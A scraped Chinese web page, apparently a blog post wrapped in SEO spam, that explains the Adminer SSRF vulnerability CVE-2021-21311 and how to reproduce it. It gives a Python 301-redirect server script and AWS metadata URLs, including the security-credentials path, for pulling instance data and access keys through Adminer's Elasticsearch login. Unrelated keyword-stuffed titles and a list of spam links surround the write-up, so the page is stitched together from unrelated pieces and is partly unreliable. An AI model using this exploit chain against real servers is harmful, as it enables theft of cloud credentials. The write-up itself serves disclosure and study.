当前位置: 首页 > news >正文

郑州淘宝网站建设郑州建站模板搭建

郑州淘宝网站建设,郑州建站模板搭建,房产网最新楼盘网,电脑网络怎么连接Adminer是一个PHP编写的开源数据库管理工具#xff0c;支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间#xff0c;连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞#xff08…Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞SSRF。 参考连接 https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml 1.在Adminer登录页面选择ElasticSearch作为系统目标并在server字段填写example.com点击登录即可看到example.com返回的400错误页面展示在页面中 Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com) 使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。 参考链接 SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHubhttps://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd 首先启动一个python服务器该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下重定向指向AWS元数据服务 http://169.254.169.254/latest/meta-data/instance-id然后在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。 重定向请求的python脚本 #!/usr/bin/env pythonimport SimpleHTTPServer import SocketServer import sys import argparsedef redirect_handler_factory(url):Returns a request handler class that redirects to supplied urlclass RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header(Location, url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header(Location, url)self.end_headers()return RedirectHandlerdef main():parser argparse.ArgumentParser(descriptionHTTP redirect server)parser.add_argument(--port, -p, actionstore, typeint, default80, helpport to listen on)parser.add_argument(--ip, -i, actionstore, default, helphost interface to listen on)parser.add_argument(redirect_url, actionstore)myargs parser.parse_args()redirect_url myargs.redirect_urlport myargs.porthost myargs.ipredirectHandler redirect_handler_factory(redirect_url)handler SocketServer.TCPServer((host, port), redirectHandler)print(serving at port %s % port)handler.serve_forever()if __name__ __main__:main() http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
http://www.dnsts.com.cn/news/263441.html

相关文章:

  • 只做外贸的公司网站中国住建部网站查询网
  • 自己网站让百度收录怎么搜索会展示网站建设策划书格式
  • 专业建筑设计网站平台seo网络优化师就业前景
  • 品牌网站制作哪家好网页制作的公司为什么瓯北没有
  • php网站开发和js文章生成器网页版
  • php网站开发机试题目wordpress广告插件下载
  • 早教网站源码互联网企业排名2021
  • 太原制作公司网站2018 84号建设厅网站
  • 网页制作与网站设计思路网站域名注册管理中心
  • 网站域名和邮箱域名如何微信公众号文章到wordpress
  • 校园网站平台建设12306网站是哪家公司做开发的
  • 关于申请建设门户网站的界面设计规范
  • 网站群建设代理邢台123式的网站怎么做
  • 写小说的网站自己做封面wordpress谷歌地图插件
  • 婚纱网站策划书模板下载智慧农业网站建设
  • 企业建设网站维护wordpress数据备份还原
  • 湘潭网站开发公司洛阳网站建设 恒凯科技
  • 佛山顺德网站设计公司设计模板主题为气流
  • 宝安三网合一网站建设wordpress如何建站群
  • 湘潭知名网站建设表白二维码生成器
  • 大连网站开发招聘wordpress安装地址
  • 赣州企业网站建设公司一人可做的加盟店
  • 域名绑定网站提示正在建设网站后台编辑框无法显示
  • 大兴网站开发网站建设咨询网站开发周期定义
  • 贵港北京网站建设wordpress主题 500
  • 互粉的网站是怎么做的wordpress死链跳转
  • 网站推广计划书范文500字网站建设中首页模板
  • django做的电子商务网站北京四大设计院
  • 建设网站前准备资料想找搜索引擎优化
  • 网站快速收录提交河南做网站团队